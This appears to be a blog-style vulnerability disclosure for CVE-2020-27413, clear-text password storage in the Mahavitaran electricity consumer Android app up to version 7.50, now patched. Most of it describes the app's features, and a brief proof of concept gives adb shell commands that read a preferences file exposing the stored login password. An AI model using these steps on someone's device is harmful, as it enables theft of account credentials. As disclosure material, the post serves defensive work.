CVE-2020-27413 Mahavitaran Android Application: Clear-text password storage

Vulnerable Software: Maharashtra State Electricity Board Android Application

Vulnerability: Clear-text password storage

Affected Version: 7.50 and prior

Patched: Yes

Vendor Homepage:

App store link:

CVE: CVE-2020-27413

CVE Author: Tejas Nitin Pingulkar

Exploit Available: POC Available

About Affected Software

The Official App for Consumer by Mahavitaran ( M.S.E.D.C.L.). Mahavitaran Consumer App enables consumers to avail Mahavitaran services at his/her fingertips. The app is simple and easy to use. It provides transparency in delivering services to consumers.

►Features :

*View and Pay bill
*Register and Track complaints
*View Bill and Payment history
*Manage Multiple Electricity Connections
*Contact 24 x7 MSEDCL Call Center
*Apply for New Connection
* Know the status of New Connection Application and Pay Estimate Charges
*Submit Meter Reading to avoid average billing
*Provide Feedback about Mahavitaran Services
*Update Contact Details ( Mobile Number & E-mail ID ) of consumer
*Find MSEDCL offices and collection centers near you
*Estimate your monthly electricity consumption and bill amount
*Get Information about the Feeder from where the power supply is provided to your connection
*Apply for the change of name
*Submit an application for addition/reduction in load


login using app
Connect over adb shell
use below commands once connected to adb shell
cd /data/data/
cat pref_login_info.xml
Password will be disclosed in clear-text

Proof Of Concept

CVE-2020-27413 Mahavitaran Android Application: Clear-text password storage

Leave a Reply

Your email address will not be published. Required fields are marked *

Scroll to top